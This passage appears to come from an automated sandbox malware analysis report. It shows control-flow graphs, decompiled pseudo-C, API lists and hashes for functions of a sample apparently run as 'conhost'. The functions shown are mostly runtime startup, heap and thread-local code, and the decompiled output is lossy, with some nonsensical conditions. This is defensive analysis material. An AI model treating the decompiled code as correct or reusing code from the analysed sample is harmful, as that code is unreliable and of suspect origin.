7ff6935c1eb4-7ff6935c1f0a call 7ff6935ce300 388->395 389->383 397 7ff6935c1f4f-7ff6935c1f66 call 7ff6935c2120 394->397 398 7ff6935c1f18-7ff6935c1f24 394->398 395->394 404 7ff6935c2051-7ff6935c2069 call 7ff6935c3d20 397->404 405 7ff6935c1f6c-7ff6935c1fa1 call 7ff6935cf5f0 * 2 397->405 400 7ff6935c1f28-7ff6935c1f46 398->400 400->400 403 7ff6935c1f48 400->403 403->397 404->405 412 7ff6935c2000-7ff6935c2007 405->412 413 7ff6935c1fa3-7ff6935c1ffb call 7ff6935ce300 405->413 415 7ff6935c203f-7ff6935c204c call 7ff6935c2120 412->415 416 7ff6935c2009-7ff6935c2015 412->416 413->412 415->353 418 7ff6935c2018-7ff6935c2036 416->418 418->418 420 7ff6935c2038 418->420 420->415
                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: FolderPathwcscat$CreateMutex_stricmp_wcsicmp
                        • String ID:
                        • API String ID: 1866625073-0
                        • Opcode ID: 901b074a1553078cb34851cb21b9db49ee9037731df52840897e38d2b090242d
                        • Instruction ID: f02e10ea792c15ffb19418c2ce29e13831f1c4f984bce1efc5645357e86bdad8
                        • Opcode Fuzzy Hash: 901b074a1553078cb34851cb21b9db49ee9037731df52840897e38d2b090242d
                        • Instruction Fuzzy Hash: D052C56190CBC291FB319B28E4163BA67A8FF99788F445171DE8CA3792EF6DD181C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C1190 Relevance: 10.7, APIs: 7, Instructions: 201sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 422 7ff6935c1190-7ff6935c11be 423 7ff6935c11c4-7ff6935c11e1 422->423 424 7ff6935c148b-7ff6935c148e GetStartupInfoW 422->424 425 7ff6935c11f9-7ff6935c1204 423->425 426 7ff6935c1499-7ff6935c14b3 call 7ff6935e0b20 424->426 427 7ff6935c11e8-7ff6935c11eb 425->427 428 7ff6935c1206-7ff6935c1214 425->428 430 7ff6935c11f1-7ff6935c11f6 Sleep 427->430 431 7ff6935c1434-7ff6935c1445 427->431 432 7ff6935c144b-7ff6935c145a call 7ff6935e0b38 428->432 433 7ff6935c121a-7ff6935c121e 428->433 430->425 431->432 431->433 440 7ff6935c1460-7ff6935c147b _initterm 432->440 441 7ff6935c1239-7ff6935c123b 432->441 436 7ff6935c14b4-7ff6935c14cd call 7ff6935e0b00 433->436 437 7ff6935c1224-7ff6935c1233 433->437 448 7ff6935c14d2-7ff6935c14da call 7ff6935e0aa0 436->448 437->440 437->441 443 7ff6935c1481-7ff6935c1486 440->443 444 7ff6935c1241-7ff6935c124e 440->444 441->443 441->444 443->444 445 7ff6935c1250-7ff6935c1258 444->445 446 7ff6935c125c-7ff6935c12a4 call 7ff6935cdbf0 SetUnhandledExceptionFilter call 7ff6935e1120 call 7ff6935cda00 call 7ff6935e1210 444->446 445->446 458 7ff6935c12c3-7ff6935c12ca 446->458 459 7ff6935c12a6 446->459 461 7ff6935c12b0-7ff6935c12b3 458->461 462 7ff6935c12cc-7ff6935c12db 458->462 460 7ff6935c1308-7ff6935c130e 459->460 464 7ff6935c1310-7ff6935c131a 460->464 465 7ff6935c1326-7ff6935c134e malloc 460->465 466 7ff6935c12b5-7ff6935c12b8 461->466 467 7ff6935c12dd-7ff6935c12e4 461->467 463 7ff6935c12bf 462->463 463->458 470 7ff6935c1320 464->470 471 7ff6935c142a 464->471 472 7ff6935c1350-7ff6935c1352 465->472 473 7ff6935c13ab-7ff6935c13df call 7ff6935cd7f0 call 7ff6935c15c0 465->473 466->467 474 7ff6935c12ba 466->474 468 7ff6935c1301 467->468 469 7ff6935c12e6 467->469 468->460 476 7ff6935c12f0-7ff6935c12ff 469->476 470->465 471->431 477 7ff6935c1358-7ff6935c1360 472->477 484 7ff6935c13e4-7ff6935c13f2 473->484 474->463 476->468 476->476 479 7ff6935c1420-7ff6935c1425 477->479 480 7ff6935c1366-7ff6935c136c 477->480 482 7ff6935c1381-7ff6935c13a4 malloc memcpy 479->482 483 7ff6935c1370-7ff6935c137b 480->483 482->477 486 7ff6935c13a6 482->486 483->483 485 7ff6935c137d 483->485 484->448 487 7ff6935c13f8-7ff6935c1400 484->487 485->482 486->473 487->426 488 7ff6935c1406-7ff6935c1415 487->488
                        C-Code - Quality: 49%
                        			E00007FF67FF6935C1190(void* __edi, void* __esp) {
				signed char _v120;
				char _v168;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* __r13;
				_Unknown_base(*)()* _t30;
				void* _t32;
				intOrPtr _t39;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				void* _t57;
				intOrPtr* _t87;
				long long _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				signed short* _t91;
				signed short* _t92;
				long long _t93;
				intOrPtr* _t95;
				intOrPtr _t97;
				long long* _t104;
				intOrPtr* _t109;
				signed short* _t110;
				signed long long _t111;
				void* _t113;
				signed short* _t114;
				long long _t118;
				void* _t123;
				void* _t124;

				_t111 =  *0x935f89c0; // 0x7ff6936020d0
				r9d =  *_t111;
				memset(__edi, 0, 0xd << 0);
				_t57 = __edi + 0xd;
				if (r9d != 0) goto 0x935c148b;
				_t97 =  *0x935f88e0; // 0x7ff693602080
				goto 0x935c11f9;
				if ( *((intOrPtr*)( *[gs:0x30] + 8)) ==  *[gs:0x30]) goto 0x935c1434;
				Sleep(??);
				asm("lock dec eax");
				if (_t113 != 0) goto 0x935c11e8;
				_t109 =  *0x935f88f0; // 0x7ff693602088
				if ( *_t109 == 1) goto 0x935c144b;
				if ( *_t109 == 0) goto 0x935c14b4;
				 *0x9360201c = 1;
				if ( *_t109 == 1) goto 0x935c1460;
				if (0 == 0) goto 0x935c1481;
				_t87 =  *0x935f8850; // 0x7ff6935f7a20
				_t88 =  *_t87;
				if (_t88 == 0) goto 0x935c125c;
				r8d = 0;
				E00007FF67FF6935CDBF0( *_t88());
				_t30 = SetUnhandledExceptionFilter(??);
				_t104 =  *0x935f88d0; // 0x7ff693602110
				 *_t104 = _t88;
				_t32 = E00007FF67FF6935CDA00(E00007FF67FF6935E1120(_t30, 0x7ff6935c1000));
				_t89 =  *0x935f8870; // 0x7ff6935c0000
				 *0x93602010 = _t89;
				E00007FF67FF6935E1210(_t32);
				_t90 =  *_t89;
				if (_t90 != 0) goto 0x935c12c3;
				goto 0x935c1308;
				if (2 == 0) goto 0x935c12dd;
				if (2 == 0) goto 0x935c12dd;
				_t91 = _t90 + 2;
				_t52 =  *_t91 & 0x0000ffff;
				if (_t52 - 0x20 <= 0) goto 0x935c12b0;
				r8d = 1;
				r8d = r8d ^ 0x00000001;
				_t48 =  ==  ? r8d : 1;
				goto 0x935c12bf;
				if (_t52 - 1 - 0x1f > 0) goto 0x935c1301;
				asm("o16 nop [cs:eax+eax]");
				_t92 =  &(_t91[1]);
				if (_t97 - 1 - 0x1f <= 0) goto 0x935c12f0;
				 *0x93602008 = _t92;
				r8d =  *_t111;
				if (r8d == 0) goto 0x935c1326;
				if ((_v120 & 0x00000001) != 0) goto 0x935c142a;
				 *0x935f2000 = 0xa;
				_t10 =  *0x93602038 + 1; // 0x7ff898063ca1
				r13d = _t10;
				_t122 = r13d << 3;
				malloc(??);
				_t110 =  *0x93602030; // 0x2954bdc1770
				_t114 = _t92;
				if (r12d <= 0) goto 0x935c13ab;
				asm("o16 nop [eax+eax]");
				_t93 =  *((intOrPtr*)(_t110 + _t111 * 8));
				if ( *_t93 == 0) goto 0x935c1420;
				r8d = 1;
				if ( *((short*)(_t93 + ( &_v168 + 1) * 2 - 2)) != 0) goto 0x935c1370;
				malloc(??);
				 *((long long*)(_t114 + _t111 * 8)) = _t93;
				memcpy(??, ??, ??);
				if ( *0x93602038 != _t111 + 1) goto 0x935c1358;
				_t22 = _t122 - 8; // -8
				 *((long long*)(_t114 + _t22)) = 0;
				 *0x93602030 = _t114; // executed
				E00007FF67FF6935CD7F0();
				_t95 =  *0x935f8880; // 0x7ff6936036c8
				_t118 =  *0x93602028; // 0x2954bdc66d0
				 *((long long*)( *_t95)) = _t118;
				_t39 = E00007FF67FF6935C15C0(_t91[1] & 0x0000ffff, _t57, 0, __esp + 0xc,  &_v168 + 1 +  &_v168 + 1, _t111 + 1, r13d << 3, _t123, _t124);
				_t50 =  *0x93602020; // 0x0
				 *0x93602024 = _t39;
				if (_t50 == 0) goto 0x935c14d2;
				_t55 =  *0x9360201c; // 0x0
				if (_t55 == 0) goto 0x935c1499;
				return _t39;
			}



































                        0x7ff6935c119f
                        0x7ff6935c11ad
                        0x7ff6935c11b8
                        0x7ff6935c11b8
                        0x7ff6935c11be
                        0x7ff6935c11cd
                        0x7ff6935c11e1
                        0x7ff6935c11eb
                        0x7ff6935c11f6
                        0x7ff6935c11fc
                        0x7ff6935c1204
                        0x7ff6935c1206
                        0x7ff6935c1214
                        0x7ff6935c121e
                        0x7ff6935c1224
                        0x7ff6935c1233
                        0x7ff6935c123b
                        0x7ff6935c1241
                        0x7ff6935c1248
                        0x7ff6935c124e
                        0x7ff6935c1250
                        0x7ff6935c125c
                        0x7ff6935c1268
                        0x7ff6935c126e
                        0x7ff6935c127c
                        0x7ff6935c1284
                        0x7ff6935c1289
                        0x7ff6935c1290
                        0x7ff6935c1297
                        0x7ff6935c129e
                        0x7ff6935c12a4
                        0x7ff6935c12a6
                        0x7ff6935c12b3
                        0x7ff6935c12b8
                        0x7ff6935c12bf
                        0x7ff6935c12c3
                        0x7ff6935c12ca
                        0x7ff6935c12cc
                        0x7ff6935c12cf
                        0x7ff6935c12d7
                        0x7ff6935c12db
                        0x7ff6935c12e4
                        0x7ff6935c12e6
                        0x7ff6935c12f4
                        0x7ff6935c12ff
                        0x7ff6935c1301
                        0x7ff6935c1308
                        0x7ff6935c130e
                        0x7ff6935c131a
                        0x7ff6935c1320
                        0x7ff6935c132d
                        0x7ff6935c132d
                        0x7ff6935c1335
                        0x7ff6935c133c
                        0x7ff6935c1341
                        0x7ff6935c1348
                        0x7ff6935c134e
                        0x7ff6935c1352
                        0x7ff6935c1358
                        0x7ff6935c1360
                        0x7ff6935c1366
                        0x7ff6935c137b
                        0x7ff6935c1384
                        0x7ff6935c138c
                        0x7ff6935c139c
                        0x7ff6935c13a4
                        0x7ff6935c13a6
                        0x7ff6935c13ab
                        0x7ff6935c13b2
                        0x7ff6935c13b9
                        0x7ff6935c13be
                        0x7ff6935c13c5
                        0x7ff6935c13d5
                        0x7ff6935c13df
                        0x7ff6935c13e4
                        0x7ff6935c13ea
                        0x7ff6935c13f2
                        0x7ff6935c13f8
                        0x7ff6935c1400
                        0x7ff6935c1415

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
                        • String ID:
                        • API String ID: 772431862-0
                        • Opcode ID: 69d72e7a95a54f0f240f20614655ae9cf3a95e6a0382e510142ec386b1f4bd1f
                        • Instruction ID: 2e93e29f6a05b8ef5b57c67f80542a32745f0c1f905bde8138a60332d96a3d4a
                        • Opcode Fuzzy Hash: 69d72e7a95a54f0f240f20614655ae9cf3a95e6a0382e510142ec386b1f4bd1f
                        • Instruction Fuzzy Hash: 8E913735E0970685FE709B56E65277923A9FF48B88F4480B5CE0EE7791DE2CE944D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C2250 Relevance: 9.1, APIs: 7, Instructions: 394COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 489 7ff6935c2250-7ff6935c22ab call 7ff6935cf5f0 * 2 494 7ff6935c22d8-7ff6935c22de 489->494 495 7ff6935c22ad-7ff6935c22d3 call 7ff6935ce300 489->495 497 7ff6935c22e0-7ff6935c22f7 494->497 498 7ff6935c22fd-7ff6935c23d5 call 7ff6935c31c0 call 7ff6935cf5f0 * 2 494->498 495->494 497->498 505 7ff6935c247c-7ff6935c2485 498->505 506 7ff6935c23db-7ff6935c2477 call 7ff6935ce300 498->506 508 7ff6935c24c0-7ff6935c24db call 7ff6935c2120 call 7ff6935c3c40 505->508 509 7ff6935c2487-7ff6935c2493 505->509 506->505 515 7ff6935c24e0-7ff6935c24e8 508->515 510 7ff6935c2498-7ff6935c24b5 509->510 510->510 512 7ff6935c24b7 510->512 512->508 516 7ff6935c24f2-7ff6935c2500 515->516 517 7ff6935c24ea-7ff6935c24f0 515->517 517->516 518 7ff6935c2501-7ff6935c252b wcslen 517->518 519 7ff6935c2531-7ff6935c253d 518->519 520 7ff6935c265d-7ff6935c267a call 7ff6935ef1e0 518->520 521 7ff6935c2684-7ff6935c2689 519->521 522 7ff6935c2543-7ff6935c2546 519->522 520->521 528 7ff6935c2691-7ff6935c26d2 call 7ff6935cf5f0 * 2 521->528 524 7ff6935c2548-7ff6935c2558 memcpy 522->524 525 7ff6935c255d-7ff6935c25ab call 7ff6935cf5f0 * 2 522->525 524->525 535 7ff6935c25e4-7ff6935c25ea 525->535 536 7ff6935c25ad-7ff6935c25df call 7ff6935ce300 525->536 541 7ff6935c26d4-7ff6935c2705 call 7ff6935ce300 528->541 542 7ff6935c270a-7ff6935c2710 528->542 539 7ff6935c2611-7ff6935c262e wcslen call 7ff6935e52a0 535->539 540 7ff6935c25ec-7ff6935c260b 535->540 536->535 539->528 550 7ff6935c2630-7ff6935c2638 539->550 540->539 541->542 543 7ff6935c2712-7ff6935c2731 542->543 544 7ff6935c2737-7ff6935c2754 wcslen call 7ff6935e52a0 542->544 543->544 544->550 551 7ff6935c275a-7ff6935c277b call 7ff6935cf5f0 * 2 544->551 552 7ff6935c2649-7ff6935c265c 550->552 553 7ff6935c263a-7ff6935c2644 call 7ff6935f0be0 550->553 559 7ff6935c27a4-7ff6935c27aa 551->559 560 7ff6935c277d-7ff6935c279f call 7ff6935ce300 551->560 553->552 562 7ff6935c27ac-7ff6935c27c4 559->562 563 7ff6935c27ca-7ff6935c27e7 wcslen call 7ff6935e52a0 559->563 560->559 562->563 563->550 566 7ff6935c27ed-7ff6935c280e call 7ff6935cf5f0 * 2 563->566 571 7ff6935c2810-7ff6935c2832 call 7ff6935ce300 566->571 572 7ff6935c2837-7ff6935c283d 566->572 571->572 574 7ff6935c283f-7ff6935c2857 572->574 575 7ff6935c285d-7ff6935c287a wcslen call 7ff6935e52a0 572->575 574->575 575->550 578 7ff6935c2880-7ff6935c28dc call 7ff6935cf5f0 * 2 575->578 583 7ff6935c2920-7ff6935c2926 578->583 584 7ff6935c28de-7ff6935c291b call 7ff6935ce300 578->584 586 7ff6935c2959-7ff6935c2976 wcslen call 7ff6935e52a0 583->586 587 7ff6935c2928-7ff6935c2932 583->587 584->583 586->550 592 7ff6935c297c-7ff6935c2984 586->592 588 7ff6935c2934-7ff6935c2951 587->588 588->588 590 7ff6935c2953 588->590 590->586 593 7ff6935c2997-7ff6935c2999 592->593 594 7ff6935c2986-7ff6935c2992 call 7ff6935f0be0 592->594 593->516 594->593
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b468ddba8a89e735bb7ea80bd7e836e68bfad696c14f3fe88ebbdc98ae7802ad
                        • Instruction ID: 569617bb8a696a141d671924bc4baf76ad314b65fdf1b42e9c578bded2ba6d3c
                        • Opcode Fuzzy Hash: b468ddba8a89e735bb7ea80bd7e836e68bfad696c14f3fe88ebbdc98ae7802ad
                        • Instruction Fuzzy Hash: AE12D4669087C291EF319B29E4067BA67A8FF99794F409271DE8CA7792EF7CD140C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C3C40 Relevance: 4.6, APIs: 3, Instructions: 65memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 21%
                        			E00007FF67FF6935C3C40(void* __esi, long long __rax, void* __rcx, long* __rdx) {
				long long _v48;
				char _v56;
				long long _v72;
				long long _v80;
				long _v88;
				long long _v96;
				long long _v104;
				long _t10;
				long _t13;
				long long _t22;
				long* _t25;

				_t22 = __rax;
				_t25 = __rdx;
				E00007FF67FF6935C3250(1, __rax, __rcx); // executed
				if (_t22 == 0xffffffff) goto 0x935c3cf0;
				_v56 = 0;
				_v48 = 0;
				_t10 = GetFileSize(??, ??);
				r13d = _t10;
				 *_t25 = _t10;
				GetProcessHeap();
				r8d = r13d;
				HeapAlloc(??, ??, ??);
				r9d = 0;
				r8d = 0;
				_v72 = 0;
				_t13 =  *_t25;
				_v80 = 0;
				_v88 = _t13;
				_v96 = _t22;
				_v104 =  &_v56;
				E00007FF67FF6935C40AF(); // executed
				E00007FF67FF6935C40CD();
				if (_t13 < 0) goto 0x935c3d08;
				return _t13;
			}














                        0x7ff6935c3c40
                        0x7ff6935c3c4a
                        0x7ff6935c3c52
                        0x7ff6935c3c5e
                        0x7ff6935c3c64
                        0x7ff6935c3c72
                        0x7ff6935c3c7b
                        0x7ff6935c3c81
                        0x7ff6935c3c84
                        0x7ff6935c3c86
                        0x7ff6935c3c8c
                        0x7ff6935c3c94
                        0x7ff6935c3c9a
                        0x7ff6935c3c9d
                        0x7ff6935c3ca2
                        0x7ff6935c3cae
                        0x7ff6935c3cb3
                        0x7ff6935c3cbc
                        0x7ff6935c3cc5
                        0x7ff6935c3cca
                        0x7ff6935c3ccf
                        0x7ff6935c3cd9
                        0x7ff6935c3ce0
                        0x7ff6935c3cef

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Heapwcslen$AllocFileProcessSize
                        • String ID:
                        • API String ID: 3094376029-0
                        • Opcode ID: 058233490db6aa5e7f0c3b2af6205fbd4667df6ba89ca657c3cbb8571d00b610
                        • Instruction ID: 351975a60c0d89fb38b6b8bc75b77a45b5032cc171b3fc0847bcdee804e9aef5
                        • Opcode Fuzzy Hash: 058233490db6aa5e7f0c3b2af6205fbd4667df6ba89ca657c3cbb8571d00b610
                        • Instruction Fuzzy Hash: 0211D332A04A5445EB22DB66B807B477694FB88BBCF800275DE6D57794EF7CC485C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D6420 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 157synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
                        • String ID: JiAlAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaaAaaAAaAAaaaaaaaAaaaAAAAAaaaa$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
                        • API String ID: 2382646235-3489439334
                        • Opcode ID: 0dbcbef70c84b9ceba19dadba48f77d72e564724fb94e55be91cebba18804d16
                        • Instruction ID: d6e3435b7ac7cbf9eb3c57ebc7bf190bd72677eb73ba9f670749d11bf179adee
                        • Opcode Fuzzy Hash: 0dbcbef70c84b9ceba19dadba48f77d72e564724fb94e55be91cebba18804d16
                        • Instruction Fuzzy Hash: C1619075A0864385FB358B26E8132B537A8FF58785F8440B6C96DE73A0EE7CA546D310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D2100 Relevance: 16.7, APIs: 11, Instructions: 179COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 144 7ff6935d2100-7ff6935d2117 145 7ff6935d22f0-7ff6935d22fd call 7ff6935d6420 144->145 146 7ff6935d211d-7ff6935d2122 144->146 149 7ff6935d2128-7ff6935d2136 145->149 153 7ff6935d2303-7ff6935d2306 145->153 148 7ff6935d22d8-7ff6935d22df 146->148 146->149 150 7ff6935d22e5-7ff6935d22e8 148->150 151 7ff6935d213c call 7ff6935d1710 148->151 149->150 149->151 155 7ff6935d2141-7ff6935d2147 151->155 153->148 156 7ff6935d2308-7ff6935d2314 call 7ff6935d6420 153->156 158 7ff6935d2180-7ff6935d218d call 7ff6935d6420 155->158 159 7ff6935d2149-7ff6935d214e 155->159 156->151 164 7ff6935d231a 156->164 162 7ff6935d2150-7ff6935d216c TlsGetValue 158->162 168 7ff6935d218f-7ff6935d2192 158->168 161 7ff6935d21a0-7ff6935d21b2 TlsGetValue 159->161 159->162 165 7ff6935d21b4-7ff6935d21c4 call 7ff6935d1250 161->165 166 7ff6935d216e-7ff6935d217b 161->166 162->165 162->166 164->155 165->166 173 7ff6935d21c6-7ff6935d21c9 165->173 168->161 170 7ff6935d2194-7ff6935d2199 call 7ff6935d6420 168->170 170->161 173->166 174 7ff6935d21cb-7ff6935d2206 GetCurrentThreadId CreateEventA call 7ff6935d7be0 173->174 178 7ff6935d220c-7ff6935d226a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 174->178 179 7ff6935d235d-7ff6935d2385 call 7ff6935d15e0 174->179 180 7ff6935d2270-7ff6935d229d GetThreadPriority 178->180 181 7ff6935f1b26-7ff6935f1b54 abort 178->181 179->181 183 7ff6935d22a3-7ff6935d22a8 180->183 184 7ff6935d2338-7ff6935d2348 call 7ff6935d6420 180->184 197 7ff6935f1b60 181->197 188 7ff6935d2320-7ff6935d232e 183->188 189 7ff6935d22aa 183->189 184->188 194 7ff6935d234a-7ff6935d234d 184->194 191 7ff6935d22ae-7ff6935d22bb TlsSetValue 188->191 189->191 191->181 195 7ff6935d22c1-7ff6935d22d1 191->195 194->189 196 7ff6935d2353-7ff6935d2358 call 7ff6935d6420 194->196 196->189 197->197
                        C-Code - Quality: 91%
                        			E00007FF67FF6935D2100(void* __ecx, void* __rdx) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t11;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t22;
				void* _t26;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t32;

				_t27 =  *0x935f8900; // 0x7ff6936023e0
				_t18 =  *_t27;
				if (_t18 == 0) goto 0x935d22f0;
				if ( *((long long*)(_t18 + 0x28)) != 0) goto 0x935d22d8;
				 *((long long*)(_t18 + 0x28)) = 0x936023a8;
				if ( *0x936023a8 == 1) goto 0x935d22e5;
				E00007FF67FF6935D1710(_t9, _t10, _t11,  *0x936023a8 - 1, _t18, _t22, 0x936023a8, _t26, _t27, _t28, _t30, _t31, _t32);
				_t19 =  *_t27;
				if (_t19 == 0) goto 0x935d2180;
				if ( *((long long*)(_t19 + 0x30)) != 0) goto 0x935d21a0;
				 *((long long*)(_t19 + 0x30)) = 0x935f3fb8;
				_t6 = TlsGetValue(??);
				if (0x935f3fb8 == 0) goto 0x935d21b4;
				return _t6;
			}





















                        0x7ff6935d210a
                        0x7ff6935d2111
                        0x7ff6935d2117
                        0x7ff6935d2122
                        0x7ff6935d2132
                        0x7ff6935d2136
                        0x7ff6935d213c
                        0x7ff6935d2141
                        0x7ff6935d2147
                        0x7ff6935d214e
                        0x7ff6935d2157
                        0x7ff6935d2160
                        0x7ff6935d216c
                        0x7ff6935d217b

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Value
                        • String ID:
                        • API String ID: 3702945584-0
                        • Opcode ID: 801ea250ad979561cca9b91b448e1b65cb30d2c3504fdc7a6e839ad33adeed12
                        • Instruction ID: 4d2e817964a08b8e149c8641a0ce7127e897936457b4a69dab3339327ed0fad5
                        • Opcode Fuzzy Hash: 801ea250ad979561cca9b91b448e1b65cb30d2c3504fdc7a6e839ad33adeed12
